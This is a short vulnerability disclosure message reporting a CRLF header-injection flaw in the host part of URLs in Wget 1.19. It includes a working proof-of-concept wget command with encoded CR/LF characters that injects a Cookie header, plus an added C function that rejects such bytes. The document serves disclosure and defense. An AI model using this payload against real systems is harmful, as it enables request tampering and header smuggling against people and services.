Hi, I just found that there is a CRLF Injection in the latest version of Wget 1.19.

Wget uses urlencode to encode CRLF in the PATH part but doesn't use it in the HOST part. So an attacker can inject arbitrary headers in the request. For example:

# This will fail
$ wget 'http://127.0.0.1/%0d%0Cookie: hi'

GET /%0d%0Cookie:%20hi HTTP/1.1
User-Agent: Wget/1.19 (linux-gnu)
Accept: */*
Accept-Encoding: identity
Host: 127.0.0.1
Connection: Keep-Alive

# This will work
$ wget 'http://127.0.0.1%0d%0aCookie%3a hi%0a/'

GET / HTTP/1.1
User-Agent: Wget/1.19 (linux-gnu)
Accept: */*
Accept-Encoding: identity
Host: [127.0.0.1 *cookie: hi* ]
Connection: Keep-Alive

I wanted to make you aware of this. Thanks for reading :)

--
- Orange -
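
A check for the condition reported above, as an added example (not part of the original message and not wget's code): percent-decode the authority part of the URL and refuse it if any decoded byte is CR, LF, another control character or a space, before anything is copied into the Host: header. The function name, the reject set and the buffer size are assumptions made for the illustration.

```c
#include <ctype.h>
#include <stdio.h>
#include <string.h>

/* Value of one hex digit, or -1 if c is not a hex digit. */
static int hexval(int c)
{
    if (c >= '0' && c <= '9') return c - '0';
    c = tolower(c);
    return (c >= 'a' && c <= 'f') ? c - 'a' + 10 : -1;
}

/* Hypothetical helper (not wget's code): percent-decode the authority
 * (host[:port]) of a URL into out. Returns 0 only if every decoded byte
 * is safe to place in a Host: header; -1 on CR, LF, other control bytes,
 * spaces, a malformed %XX escape, an empty authority or a full buffer. */
int decode_authority_checked(const char *url, char *out, size_t outlen)
{
    const char *p = strstr(url, "://");
    size_t n = 0;
    if (!p) return -1;
    for (p += 3; *p && *p != '/' && *p != '?' && *p != '#'; p++) {
        int c = (unsigned char)*p;
        if (c == '%') {
            int hi = hexval((unsigned char)p[1]);
            int lo = hi < 0 ? -1 : hexval((unsigned char)p[2]);
            if (lo < 0) return -1;          /* truncated or non-hex escape */
            c = hi * 16 + lo;
            p += 2;
        }
        if (c <= 0x20 || c == 0x7f) return -1;  /* checked after decoding */
        if (n + 1 >= outlen) return -1;
        out[n++] = (char)c;
    }
    if (n == 0) return -1;
    out[n] = '\0';
    return 0;
}

int main(void)
{
    const char *urls[] = { "http://127.0.0.1/%0d%0Cookie: hi",       /* from the report */
                           "http://127.0.0.1%0d%0aCookie%3a hi%0a/" };
    char host[64];
    for (int i = 0; i < 2; i++)
        printf("%s -> %s\n", urls[i],
               decode_authority_checked(urls[i], host, sizeof host) ? "rejected" : host);
    return 0;
}
```

The first URL from the report yields the host 127.0.0.1 because its escapes sit in the path; the second is rejected at the decoded CR.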
